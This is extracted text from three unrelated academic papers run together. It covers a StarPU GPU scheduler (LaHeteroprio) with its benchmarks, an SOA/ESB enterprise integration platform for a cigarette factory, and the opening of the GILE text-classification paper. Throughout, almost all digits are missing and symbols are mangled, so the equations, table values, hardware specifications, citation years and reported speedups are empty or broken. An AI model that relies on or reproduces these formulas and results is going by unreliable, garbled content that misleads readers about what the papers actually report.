are labeled mn and in the case the scores assign the best values to more than one memory nodes, all of them are written inside brackets. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ distance between memory nodes first, we build a distance matrix between the memory nodes. we defined the data transfer speed between memory nodes as an inverse of the distance; the distance is given by starpu and it is the time that takes to move a piece of data from one memory node to another distancetransferði; jÞ ¼ normalizeðstarpu transfer predictðj; i; ÞÞ: ( ) however, it is important to remember that our scheduler is based on priorities and thus we also use a second metric to look at the difference in terms of priorities between the workers of different memory nodes. 
more precisely, we define a priority distance between workers of different memory nodes by distancepriorityði; jÞ ¼ � pb k¼ jpði; kÞ � pðj; kÞj ðmaxðnpi; npjÞ þ Þ � ðmaxðnpi; npjÞ þ Þ= : ( ) the numerator of the fraction provides a difference factor between i and j, whereas the denominator part ensures that the values stays between and . the value is obtained when two workers used the same priority indexes. they access the same buckets in the same order. in table , we provide examples of the priority distance for two array indexes. finally, we use both distance coefficients to find a balance between priorities and memory transfer capacities, and we obtain the final measure with distanceði; jÞ ¼ distancepriorityði; jÞ � a � � þ distancetransferði; jÞ � ð � aÞð Þ: ( ) from eq. ( ), two memory nodes are close if they are well-connected and if their priorities (how their workers iterate on the buckets) are different. prioritizing locality/priorities in the access orders using the distance matrix between the memory nodes, two straightforward access orders can be considered. in the first one, we consider that data locality is more critical than the b u ck e ts figure view of the best memory node difference (bmd), which is computed by counting the number of difference returned by the dlaf between the moment when a task is pushed or popped. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ priority of the tasks; in this case, a worker iterates on all the lists related to its memory node following the priority order, and only if it cannot find a ready task it looks at the lists of the second closest memory node. the workers iterate over g(b,m) with an outer loop of indexes m and an inner loop of index b (column-by-column). in a second case, we chose priority over data locality; in this case, a worker iterates with an outer loop of indexes b and an inner loop of index m (row-by-row). one drawback of the locality-oriented access is that it pushes the priorities in the background, which means that a local task of low priority should always be done before a less local task of higher priority. on the other hand, the priority oriented access breaks the locality benefit because a worker looks at all the memory nodes’ task-lists one priority after the other. hence, both approaches are balanced using subgroups in this study. memory node subgroups we propose that each memory node sees the others as two separate groups. the idea is to maximize the exchanges with the first group of size s, and use the second group only to steal tasks to avoid being idle. to do so, we use a locality coefficient l that correspond to the number of consecutive buckets that are queried before going to the next memory node. the iterations on the grid g are done so that the worker looks at the l first buckets of its memory node, then at the l first buckets of its s closest memory nodes. this is done until all buckets of the worker’s memory node and the s subgroups have been scanned. then, in a second stage, the other memory nodes, from s + to m, are scanned bucket after bucket. both s and l parameters can be different for each memory nodes. an example of this access order strategy can be seen in table . with the settings given in the example, we use l = for the cpu workers, see table b. 
consequently, the cpu workers look at two buckets of the cpu memory node lists, before looking at the gpu lists. performance study configuration the following software configuration was used: gnu compiler . , cuda tookit . , intel mkl and starpu . we set the environment variables starpu_cuda_pipeline= , starpu_prefetch= and starpu_disable_pinning= . from eq. ( ), we defined a = . , and as a result the closest memory node to any gpu was always the cpu. starpu supports multi-streaming capability of modern gpus by running multiple cpu threads to compute on the same gpu. this is controlled by starpu_nworker_per_cuda table priority distance examples between buckets/priorities indexes of i and j. priorities for i priorities for j distancepriority (i,j) - . - . - - . - . - . we created our scheduler on the master branch of the official repository https:// scm.gforge.inria.fr/anonscm/git/starpu/ starpu.git at commit id e e e e c c a d d b d e bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and we used different values depending on the hardware and the application that was run. the set values were application specific. the automatic dlaf selection, described in the section “automatic dlaf selection,” was based on ls_sdh, ls_sdh , ls_sdhb and lc_smwb, but excluded laru and mc_starpu. hardware we used two different configurations and we refer to each of them using their corresponding gpu model. � p is composed of � dodeca-core haswell intel xeon e - v , ghz, and � p gpu (dp . teraflops). � k is composed of � dodeca-core haswell intel xeon e - v , ghz and � k gpu (dp . teraflops). applications we studied three applications to assess our method. two of them were linear algebra applications that already used starpu and heteroprio. hence, no further development was table access list examples for a configuration with one cpu and two gpus (three memory nodes in total). (a) distance matrix from eq. ( ). cpu gpu- gpu- cpu . gpu- . gpu- . (b) access order for cpu workers. priorities buckets g(*,cpu) g(*,gpu- ) g(*,gpu- ) g( ,*) g( ,*) g( ,*) g( ,*) (c) access order for gpu- workers. priorities buckets g(*,cpu) g(*,gpu- ) g(*,gpu- ) g( ,*) g( ,*) g( ,*) (d) access order for gpu- workers. priorities buckets g(*,cpu) g(*,gpu- ) g(*,gpu- ) g( ,*) g( ,*) g( ,*) note: we use four buckets, but the tasks of bucket zero are only active on cpu. the priorities—the order of access to the buckets—is reversed for the gpu workers. s, the size of closed memory node subgroup, is set to two for the cpu and to one for the gpus. finally, the locality factor l is two for both. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ needed inside them since the interfaces of heteroprio and laheteroprio are similar. the third one was a stencil application that we modified to be able to use heteroprio/ laheteroprio. � qrmumps this application uses four different types of tasks and three of them can be run on the gpus. we used starpu_nworker_per_cuda= on p , and starpu_nworker_per_cuda= on k . the test case was the factorization of the tf matrix . � spldlt this application uses four different types of tasks and only one of them can run on the gpus. 
consequently, to select a task for a gpu, there is no choice in terms of bucket/priority but only in terms of memory node. we used starpu_nworker_per_ cuda= on p , and starpu_nworker_per_cuda= on k . the test case was the cholesky factorization of a , � , matrix. � starpu-stencil this application is a stencil simulation of the game life, which is available as an example in the starpu repository. it uses only one type of tasks that can run on cpu or gpu. consequently, to select a task for any of the processing unit, there is no choice in terms of bucket/priority but only in terms of memory node. we used starpu_nworker_per_cuda= on p and k . the test case was a grid of dimension , executed for iterations. metrics in our tests, we evaluated two different speedups. the first was the speedup-from-average (sfa), which represents the average execution times of heteroprio based for six executions, divided by the average execution times of a target for six executions. the second was the speedup-from-minimum (sfm), which represents the lowest execution time of heteroprio divided by the lowest execution time of a target, therefore, both were obtained from a single execution. the sfa provides information of the average performance that can be expected whereas the sfm provides information about the variability and gives us an idea of what could be achieved if the executions were always perfect. evaluation of the locality coefficient for all dlaf we first evaluated the effect of the locality coefficient l, described in the section “memory node subgroups,” on the execution time and summarized the results in fig. . then, we looked at the speedup of laheteroprio against heteroprio for different l settings with three different comparisons. in the first one, we used all the average execution times obtained using laheteroprio without dissociating the different dlaf; in the second one we computed the speedup using only the best dlaf (with the lowest average), and in the third one we compared the unique best execution over all of both heteroprio and laheteroprio. focusing on qrmumps, it can be seen in figs. a and b that the best performance was obtained when we prioritized the locality for the gpu with lgpu = . the locality coefficient for the cpu seems less critical and the speedup is more or less the same for all lcpu values. when the number of gpus increases, the influence of l decreases, and we the matrix had been taken from the suitesparse matrix collection at https://sparse.tamu.edu/ bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://sparse.tamu.edu/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) qrmumps/k (b) qrmumps/p (c) spldlt/k (d) spldlt/p (e) starpu-stencil/k (f) starpu-stencil/p figure speedup results of laheteroprio against heteroprio for qrmumps (a, b), spldlt (c, d) and starpu-stencil (e, f) on k or p configurations. the x-axis is used of the different l pairs of the form (lcpu, lgpu). the gray bars (▪) represent sfa for all dlaf and gives an idea of the speedup of laheteroprio, here each configuration is executed six times. the light gray bars (▪) represent the sfm of the dlaf with the best speedup in average. the lines (- � -) represent the sfm using the best execution times among all dlaf, that is the speedup when we compare the best single execution using heteroprio and laheteroprio. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ had similar executions with two p gpus or four k gpus for all l values. however, the speedup against heteroprio was still significant, which means that splitting the buckets into several lists is beneficial as soon as the workers pick first in the list that corresponds to their memory node for their highest priority bucket. also, it seems that the way they iterate on the grid does not have any effect. the results for spldlt are provided in figs. c and d. here, the impact of l seems to be limited, but it is worth remembering that the gpu can only compute one type of task. on the other hand, the speedup obtained using all dlaf was unstable and significantly lower compared to the speedups obtained when we used only the best dlaf. this suggests that there are significant differences in performance among the different dlaf and also that some of them are certainly not efficient. the results that we provide in the next section corroborates this hypothesis. the results for starpu-stencil are provided in figs. e and f. there is no choice in the value l because there is only one type of task. the speedup obtained using all dlaf was unstable and significantly lower compared to the speedups obtained when we used only the best dlaf, which again suggests that the different dlaf provide heterogeneous efficiency. execution details using the performance results of section “evaluation of the locality coefficient for all dlaf,” we used a l = ( , ) for qrmumps, and a l = ( , ) for spldlt. we evaluated the performance of the different dlaf described in the section “task insertion in the grid with locality evaluation (push),” looking for the speedup against heteroprio, the amount of memory transfer, and the bmd, see figs. – . speedup we provide the speedup obtained with our method against heteroprio in figs. a and b for qrmumps, figs. a and b for spldlt, and figs. a and b for starpu-stencil. for all configurations, the laru and mc_starpu formulas did not significantly improve the execution, furthermore, they were slower than heteroprio in some cases. for laru, this means that having one piece of data already on the memory node and neglecting the others is not efficient. meanwhile, for mc_starpu, it means that putting a task on the memory node for which it is the cheapest in terms of data transfer is not the best choice. this is not surprising, since this kind of decision would make sense if we have only one task to compute. however, we clearly see that in the present study, when we had to deal with a graph of tasks, where the data were used concurrently and could be re-used by other tasks, this was not accurate. nevertheless, this result could also have been affected from inaccurate predictions made by starpu. comparing the different dlaf, it can be seen that both ls_sdh and ls_sdhb significantly improved the three applications. lc_smwb was competitive for qrmumps and starpu-stencil but not for spldlt, and ls_sdh was competitive for starpu-stencil but not for qrmumps and it had poor performance for spldlt. the main difference between ls_sdh /ls_sdhb and lc_smwb/ls_sdh is that the second ones are not bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) qrmumps/k - speedup (b) qrmumps/p - speedup (c) qrmumps/k - memory transfer (d) qrmumps/p - memory transfer (e) qrmumps/k - bmd (f) qrmumps/p - bmd figure execution details for qrmumps on k or p configurations for a locality coefficient l = ( , ). 
the speedup (a, b) includes sfa (▪) and sfm (- � -). the memory transfers (c, d) and bmd (e, f) are average values. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) spldlt/k - speedup (b) spldlt/p - speedup (c) spldlt/k - memory transfer (d) spldlt/p - memory transfer (e) spldlt/k - bmd (f) spldlt/p - bmd figure execution details for spldlt on k or p configurations for a locality coefficient l = ( , ). the speedup (a, b) includes sfa (▪) and sfm (- � -). the memory transfers (c, d) and bmd (e, f) are average values. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a) starpu-stencil/k - speedup (b) starpu-stencil/p - speedup (c) starpu-stencil/k - memory transfer (d) starpu-stencil/p - mem- ory transfer (e) starpu-stencil/k - bmd (f) starpu-stencil/p - bmd figure execution details for starpu-stencil on k or p configurations for a locality coefficient l = ( , ). the speedup (a, b) includes sfa (▪) and sfm (- � -). the memory transfers (c, d) and bmd (e, f) are average values. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ giving an important load to the pieces of data used in write, and ls_sdh does not even make a distinction between read and write. it seems that taking into account write is important for qrmumps and spldlt but not for starpu-stencil. on the two linear algebra applications, the tasks transform the blocks of the matrix, and many of the blocks are written several times before being read multiple times. on the contrary in starpu-stencil, each block is written once per iteration and read only to compute the close neighbors. while the results from the different dlaf are diverse, our automatic formula selection, described in the section “automatic dlaf selection,” was efficient and always close to the best execution. consequently, there is no need to try the different dlaf as the automatic selection is reliable. transfer the total amount of memory transfer obtained with our method and heteroprio are provided in figs. c and d for qrmumps, figs. c and d for spldlt, and figs. c and d for starpu-stencil. for qrmumps, all approaches used in this study reduced the total memory transfer. however, a decrease of the memory transfer does not necessary mean having better performance. for example, for the k configuration, and with either one or two gpus, mc_starpu drastically reduced the amount of data transfer compared to heteroprio, see fig. c, but it had a negative speedup, see fig. a. it means that, even if in all laheteroprio-based executions the workers iterated similarly on g, the placement of the tasks on the grid can be quite efficient in terms of transfer, but it penalized the whole execution. in the case of spldlt, the memory transfer did not decrease compared to heteroprio when mc_starpu, laru, or ls_sdh were used. this further supports our idea that the data in write should count more than the data in read. moreover, lc_smwb balances the data in write but only with a factor at most; even if it reduced the memory transfer compared to heteroprio, the reduction was not as large compared with ls_sdh /ls_sdhb. 
finally, when we used spldlt the amount of memory transfer and the execution time were reduced. looking at the results of starpu-stencil, the memory transfer reduction was not as strong as for qrmumps. in addition, there is a correlation between the transfer reduction and the resulting speedup, such that the lowest amount of transfer were obtained with ls_sdh, ls_smwb and ls_sdhb for most of the configurations. again, the automatic mode is efficient and even when one of the dlaf is not competitive, for instance lc_smwb in the case of qrmumps/spldlt or lc_sdh for starpu-stencil, the automatic system is robust enough to make correct decisions and remains competitive. bmd we provide the bmd values for the different dlaf in figs. e and f for qrmumps, figs. e and f for spldlt, and figs. e and f for starpu-stencil. for qrmumps, the bmd values were low for all formulas except ls_sdh and laru. these measures proof that ls_sdh is sensitive to the data changes that happen in the bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time that takes a pushed task to be popped. furthermore, this is due to its formula as it considers the data in read or write to be the same. on the other hand, mc_starpu was stable with a small bmd value. however, this is surprising, because the high value for ls_sdh illustrates the volatility of the data, and thus mc_starpu should also be sensitive to the changes that happened between push/pop. for spldlt and starpu-stencil, we observed a clear relation between the bmd values and the speedup. the formulas that did not provide a speedup are the ones with the highest bmd values. this validates the construction of our automatic method that uses the dlaf with the lowest bdm. in the three applications, the laru has a special meaning when looking at the bmd value. when a task is pushed, laru returns the id of the memory node of the worker that push the task and similarly, when a task is popped, laru returns the id of the memory node of the worker that pop the task. therefore, the laru’s bdm value is the percentage of tasks that are pushed and popped by worker related to different memory nodes. therefore, we see that in qrmumps up to % of the tasks were stolen but this number grow up to % for starpu-stencil and % for spldlt. summary of the evaluation the speedup obtained with laheteroprio was really significant. in most cases, there was a proportional relation between memory transfer and execution time, which means that reducing memory transfer caused a reduction in the time needed to execute the task. the bmd metric is valuable to evaluate the robustness of dlaf and it can be used to predict its performance. moreover, our automatic dlaf selection based on bmd was highly competitive with a speedup close to the best-achieved executions. finally, laheteroprio reduced the amount of memory transfer with any number of gpus for the three applications. conclusion we have improved our heteroprio scheduler with a new mechanism that considers data locality. the new system divides the task buckets into as many lists as there are memory nodes. we have created different formulas to evaluate the locality of a task regarding a memory node, and we found that formulas that omit many parameters (as the use of the starpu prediction functions) provide a low performance; this is probably due to the neglect of the type of accesses of the tasks on the data. 
conclusion
we have improved our heteroprio scheduler with a new mechanism that takes data locality into account. the new system divides the task buckets into as many lists as there are memory nodes. we have created different formulas to evaluate the locality of a task with respect to a memory node, and we found that formulas that omit many parameters (such as the use of the starpu prediction functions) provide low performance; this is probably due to neglecting the type of access the tasks perform on the data. nevertheless, we have shown that the locality evaluation is more sensitive to write accesses, and this has been validated by the results of the bmd metric. concerning the pop strategy, it is necessary to set the locality coefficient to the largest value for the gpus, to ensure that workers focus on locality before priorities. our new scheduler can be used without introducing additional information or modifications, thanks to our automatic dlaf selection system, which is close to the best executions in most cases. finally, our new scheduler improves the performance of qrmumps, spldlt and starpu-stencil by %, % and %, respectively, and it reduces the data transfer by more than %.
in terms of perspectives, the scheduler could still be improved in several respects. it could be beneficial to change the distance between the memory nodes at runtime, which means changing the victims of the work stealing, and even having workers of the same memory node steal tasks from other memory nodes. in addition, the original priorities of the scheduler are set per architecture and the new locality heuristic is set per memory node, but a finer approach could be interesting, even though its tuning and setup would be challenging. for example, we could have one worker per gpu that uses a different access order over the buckets, with the objective of avoiding some transfers. finally, we would like to study laheteroprio on other kinds of applications with more diverse types of tasks, and on different types of hardware configurations.
acknowledgements
the experiments presented in this paper were carried out using the plafrim experimental testbed, supported by inria, cnrs (labri and imb), université de bordeaux, bordeaux inp and conseil régional d'aquitaine (see https://www.plafrim.fr/). we would like to thank alfredo buttari for his support on qrmumps, and florent lopez for his support on spldlt.
additional information and declarations
funding: there was no funding for this work.
competing interests: the authors declare that they have no competing interests.
author contributions: bérenger bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
data availability: the supplemental files include the source code of the scheduler and the details of the executions of qrmumps and spldlt in two raw data/csv files. these results were used to generate the figures for the article, but they also contain additional information not presented in the article.
supplemental information: supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
international journal of advanced network, monitoring and controls, volume , no.
research on enterprise application integration platform based on soa architecture
liu pingping, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com
lu jiaxing, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com
abstract—the tobacco industry was one of the earliest industries in china to pursue informatization, so many problems remain, such as the lack of overall planning, a wide range of application systems with a low degree of information-resource integration, and the serious problem of "information islands". to establish an efficient and flexible way of exchanging information within the enterprise, an enterprise application integration platform based on the soa architecture is proposed. the platform takes an esb as its core, reshapes enterprise information integration into a new form that conforms to the soa architecture, and introduces the idea of centralized basic data management, so as to optimize the overall information resources of the enterprise.
keywords—soa framework; information interaction; esb; information integration
i. introduction
soa (service-oriented architecture) has been widely used in the it industry in the 21st century. it is an architecture, not a technology or a method; it can also be regarded as a design idea. in china, many enterprises have begun to build enterprise integration platforms based on soa, for example kingdee apusic soa. fmqm exotica, developed by ibm's almaden laboratory, is a distributed workflow management system based on persistent message queues; it stores workflow execution information in persistent message queues so that all nodes in the execution process are completely independent.
the soa architecture has three significant advantages: loose coupling, coarse granularity, and location and protocol transparency. loose coupling is achieved through the encapsulation of services; it reduces the dependencies between services, improves the flexibility of each service, and avoids forced adjustments whenever other services change, thus greatly improving service reusability. coarse granularity means that the service interfaces defined in soa are close to actual user operations. location and protocol transparency means that when accessing a service defined under soa, the caller does not need to know the specific location or transport protocol of the service; even if the location or transport protocol changes, the client that invokes the service does not need to change.
based on an investigation and analysis of the information islands, the high coupling, and the poor integration extensibility of the systems in the bj cigarette factory, an soa-based enterprise application integration platform design suited to the actual situation of the enterprise is proposed to solve the current problems. therefore, by studying the practical application of soa-based enterprise application integration in cigarette enterprises, by examining the soa architecture and esb technology, and by analyzing the actual information-integration problems of cigarette manufacturing enterprises, this paper puts forward a design for an enterprise application integration platform adapted to the actual situation of the enterprise.
ii.
the current situation
the tobacco industry started information construction early in china, and at present its level of informatization is generally high. bj cigarette factory, as the main cigarette manufacturing enterprise in shaanxi province, has accumulated many application systems after years of information construction, covering all aspects of the factory from production to management. the main information systems include the manufacturing execution system (mes), the enterprise resource planning (erp) system, the logistics system, the data acquisition system in the production workshop, the centralized control system in the silk-making workshop, the power and energy management system, the human resource management system, the enterprise card system, and so on.
as the number of application systems grows, the problem is not only the inconsistency of basic data but also the complexity of system integration. the traditional integration method generally adopts a point-to-point mode, in which each pair of systems needs a dedicated integration channel. as shown in figure , integrating n application systems generates n × (n − 1) integration channels, with high complexity, and every new application system to be integrated increases this complexity rapidly (a short calculation illustrating this is sketched at the end of this section).
figure . integration complexity
in summary, the current informatization problems of bj cigarette factory mainly include the following aspects:
) there are isolated information islands: some application systems remain closed off because they lack external integration means.
) the basic data of the enterprise is scattered across different application systems and maintained separately, so it is difficult to keep the basic data of the whole enterprise consistent and sourced from a single place. the lack of a unified basic data coding system makes information interaction difficult.
) basic data depends on a business system and is highly coupled to it. at present, the enterprise's basic data mainly resides in the erp system, yet its purpose is to provide fundamental data to all application systems of the whole enterprise, so relying on a single application system causes unnecessary impact on the other consumers of basic data.
) poor integration scalability. at present, the information systems of the whole enterprise adopt the point-to-point integration mode. if a new application system wants to join, it needs the cooperation of every existing application system, and upgrading or transforming an existing application system also involves many external interface changes.
) the lack of management and monitoring of the data interaction process makes it difficult to find and deal with problems in time. some data has strict timeliness requirements, and if it cannot be delivered in time, the actual business is significantly affected. effective management and monitoring measures are therefore needed for the data interaction process.
) point-to-point integration increases the network burden: much of the exchanged data is duplicated yet cannot be reused, which wastes resources.
analyzing and addressing the enterprise's current problems comes down to one core task: establishing a reasonable and efficient way of integrating information.
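to put the channel counts above in perspective, the following short python calculation compares the point-to-point mode with a bus-based mode; the assumption that each system needs only a single connection to the bus is ours and is used purely for illustration.

```python
# illustrative comparison of integration channel counts.
# assumption (ours): with a service bus, each system needs only one connection.

def point_to_point_channels(n: int) -> int:
    """dedicated channels between every ordered pair of n systems: n * (n - 1)."""
    return n * (n - 1)

def bus_channels(n: int) -> int:
    """with an enterprise service bus, each system connects only to the bus."""
    return n

if __name__ == "__main__":
    for n in (5, 10, 20):
        print(f"{n} systems: point-to-point={point_to_point_channels(n)}, bus={bus_channels(n)}")
```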
in recent years, with the continuous development of information integration technology and the formulation of a series of standards and specifications, a new solution has gradually attracted attention: enterprise application integration (eai) based on the service-oriented architecture (soa). it regards each application system in the enterprise as a service unit of the soa architecture and establishes an enterprise application integration platform to realize information integration between the application systems. in such an enterprise application integration platform, an enterprise service bus (esb) is needed to provide standardized services. the enterprise service bus is the service operation support platform of the soa architecture, and the services encapsulated by the other application systems run on this bus, as shown in figure ; its establishment can effectively replace the enterprise's current disordered, meshed integration mode. secondly, a data exchange management platform needs to be established to manage all services running on the enterprise service bus and to monitor the data interaction process during integration. finally, a basic data management platform needs to be established as a service provider in the soa architecture, providing basic data management functions for the other application systems. the basic data management platform integrates the basic data of the other application systems and manages it uniformly, so the other systems no longer need to maintain it separately.
figure . schematic diagram of the optimized enterprise integration channels
iii. design and implementation
since ibm wmb (websphere message broker) is used as the enterprise service bus, ibm db is used as the database and ibm was (websphere application server) as the application server for better overall stability. according to the requirements analysis, the data exchange platform, acting as the enterprise service bus, provides a unified entry service ws?mb. after another application system calls this service, the esb parses and routes the incoming message and finds the corresponding registered business-processing web service to invoke. the data exchange management platform is responsible for the management and monitoring of the ibm wmb enterprise service bus. in the data exchange management platform, it is necessary to register, modify, disable, re-enable, and otherwise manage the services that process business. at the same time, the data exchange management platform should also log data transmissions in order to monitor the data exchange process.
figure . technical framework of the platform
iv. design of the enterprise service bus
as the core module of the enterprise application integration platform, the data exchange platform undertakes the important work of message transmission. figure shows a basic data exchange process. the data exchange platform publishes a unified entry service ws?mb as a web service. the service caller first calls this service and sends the request to the data exchange platform in the form of an xml message. the data exchange platform analyzes the message content, finds the actual service to call, and forwards the message to it; the actual service provider returns the processed result to the data exchange platform as an xml message, and the data exchange platform then returns it to the original caller.
figure . flow chart of data exchange
the request message sent by the service caller should contain complete routing information. how should the routing information be defined? from the data exchange process it can be seen that three elements, namely the data sender, the data receiver and the service to be called, constitute a unique data flow, so the routing information should also contain these three elements. the unified format of the service call request xml message is defined as follows:
<?xml version=" . " encoding="gb "?>
<msg>
  <head>
    <id></id>            // message id or serial number
    <name></name>        // message description
    <source></source>    // data source
    <target></target>    // data destination
    <sername></sername>  // id of the service to call
    <msgtype></msgtype>  // type of message ( : normal, : request, : answer)
    <rtcode></rtcode>    // return value of the corresponding request ( : success, : failure)
    <rtdesc></rtdesc>    // return description of the corresponding request
    <backup></backup>    // standby information
    <backup></backup>
    <backup></backup>
    <date>xxxx/xx/xx xx:xx:xx</date>  // message sending time
  </head>
  <data>
    <table tablename='table name' fieldname='column description' ...>
      <row action='insert' id='primary key value' fieldname='aaa' fieldname='bbb' ...>
        <table tablename='table name' fieldname='column description' ...>
          <row action='insert' id='' fieldname='aaa' fieldname='bbb' .../>
        </table>
      </row>
    </table>  // the main body of the data being sent: table represents a data table, row holds the actual data, and a table can be nested inside a table to represent a master-detail structure
  </data>
</msg>
in this xml definition, the head part describes the basic information of the data, and the three attributes source, target and sername are the most important routing information. through these three attributes, the service that the data needs to call can be uniquely determined, that is, the consumer of the service, the provider of the service and the name of the service. these attributes are registered through the service management module; after the unified entry service receives the xml data, it invokes the corresponding service according to these three attributes and the service registration information in the management module, and forwards the data. a small sketch of such routing is given below.
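as an illustration of how such routing could work on the receiving side, the following sketch parses the head of a request and dispatches it to a registered service. this is a simplified python illustration rather than part of the platform's actual implementation (which runs on ibm wmb); the registry structure and all function names are hypothetical, and only the three routing attributes from the message head are used.

```python
# simplified sketch (hypothetical names, not the platform's actual code):
# route an incoming xml request to a registered web service using the three
# routing attributes of the message head: source, target and sername.
import xml.etree.ElementTree as ET

# hypothetical registry filled in by the service management module:
# (source, target, service name) -> callable that invokes the real web service.
SERVICE_REGISTRY = {}

def register_service(source, target, sername, handler):
    SERVICE_REGISTRY[(source, target, sername)] = handler

def route_message(xml_text):
    """parse the message head and dispatch the data body to the registered service."""
    msg = ET.fromstring(xml_text)
    head = msg.find("head")
    key = (head.findtext("source"), head.findtext("target"), head.findtext("sername"))
    handler = SERVICE_REGISTRY.get(key)
    if handler is None:
        return "<rtcode>failure</rtcode>"  # no matching registration
    return handler(msg.find("data"))       # forward the data body to the provider
```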
v. implementation
the main functions of the data exchange management platform are service management and monitoring of the data exchange process. figure shows the main interface of the data exchange management platform: the frequency of data exchange can be computed from the logs, and the reception and transmission volumes of each system and data item accessing the platform can be displayed intuitively.
figure . main interface of the data exchange management platform
a) the service governance function is realized by registering and managing the web services published by each application system. as shown in figure , the contents to be registered include: sequence number, system name, interface name, enabling flag, source, target, interface service name, web service url, namespace, input object of the calling method, input parameter name, output parameter name, output object of the calling method, extended input parameter, extended input parameter value, authentication information, web service technology, remarks, and so on (for confidentiality reasons, the figure is not complete).
b) figure shows the implementation of the authority management function of the basic data management platform. the maintenance of basic data is usually carried out by the personnel in charge of the specific business, and different business personnel are usually responsible for different data. the authority management module can configure the add, modify, delete and query permissions for the various kinds of basic data according to different roles, and can also configure whether specific attributes are visible; the rbac (role-based access control) model is implemented.
figure . data operation module
first, different roles are configured in role management; then the permissions of each role are configured through the role-function relationship; finally, the roles of different users are configured through the role-user or user-role relationship. a user can have multiple roles, and a role can be held by multiple users at the same time. figure shows the implementation of the data synchronization module of the basic data management platform. by customizing the interface content and configuring different sending interfaces for different systems, one can configure whether each attribute column of the basic data is sent and the name under which it is sent, and the sent content can also be filtered and grouped through sql statements.
figure . authority management
figure . definition of an interface service
the other application systems publish and register their basic-data-receiving services in the data exchange management platform. once the basic data management platform has configured the interface, whenever new basic data maintenance is completed, the platform automatically sends the data to the corresponding systems through the data exchange platform according to the interface configuration. all application systems adopt this mode, and the basic data is thereby unified.
vi. conclusion
in this paper, based on an understanding of the application status of the soa architecture in the bj cigarette enterprise, an enterprise integrated information system based on the soa architecture is proposed to solve the enterprise's current problems of information islands, high coupling between systems, and poor integration and extensibility. the basic data management platform manages and synchronizes the basic data of the whole enterprise in a centralized way, so as to solve the application-system integration problems caused by data inconsistency.
gile: a generalized input-label embedding for text classification
nikolaos pappas, james henderson
idiap research institute, martigny, switzerland
{nikolaos.pappas,james.henderson}@idiap.ch
abstract
neural text classification models typically treat output labels as categorical variables which lack description and semantics. this forces their parametrization to be dependent on the label set size, and, hence, they are unable to scale to large label sets and generalize to unseen ones. existing joint input-label text models overcome these issues by exploiting label descriptions, but they are unable to capture complex label relationships, have rigid parametrization, and their gains on unseen labels often come at the expense of weak performance on the labels seen during training. in this paper, we propose a new input-label model which generalizes over previous such models, addresses their limitations, and does not compromise performance on seen labels. the model consists of a joint non-linear input-label embedding with controllable capacity and a joint-space-dependent classification unit which is trained with cross-entropy loss to optimize classification performance. we evaluate models on full-resource and low- or zero-resource text classification of multilingual news and biomedical text with a large label set. our model outperforms monolingual and multilingual models which do not leverage label semantics and previous joint input-label space models in both scenarios.
introduction
text classification is a fundamental nlp task with numerous real-world applications such as topic recognition (tang et al., ; yang et al., ), sentiment analysis (pang and lee, ; yang et al., ), and question answering (chen et al., ; kumar et al., ). classification also appears as a subtask for sequence prediction tasks such as neural machine translation (cho et al., ; luong et al., ) and summarization (rush et al., ). despite the numerous studies, existing models are trained on a fixed label set using k-hot vectors and, therefore, treat target labels as mere atomic symbols without any particular structure to the space of labels, ignoring potential linguistic knowledge about the words used to describe the output labels.
given that semantic representations of words have been shown to be useful for representing the input, it is reasonable to expect that they are going to be useful for representing the labels as well. previous work has leveraged knowledge from the label texts through a joint input-label space, initially for image classification (weston et al., ; mensink et al., ; frome et al., ; socher et al., ). such models generalize to labels both seen and unseen during training, and scale well on very large label sets. however, as we explain in section , existing input-label models for text (yazdani and henderson, ; nam et al., ) have the following limitations: (i) their embedding does not capture complex label relationships due to its bilinear form, (ii) their output layer parametrization is rigid because it depends on the dimensionality of the encoded text and labels, and (iii) they are outperformed on seen labels by classification baselines trained with cross-entropy loss (frome et al., ; socher et al., ).
in this paper, we propose a new joint input-label model which generalizes over previous such models, addresses their limitations, and does not compromise performance on seen labels (see figure ). our code is available at github.com/idiap/gile. the proposed model is comprised of a joint non-linear input-label embedding with controllable capacity and a joint-space-dependent classification unit which is trained with cross-entropy loss to optimize classification performance. the need for capturing complex label relationships is addressed by two non-linear transformations which have the same target joint space dimensionality.
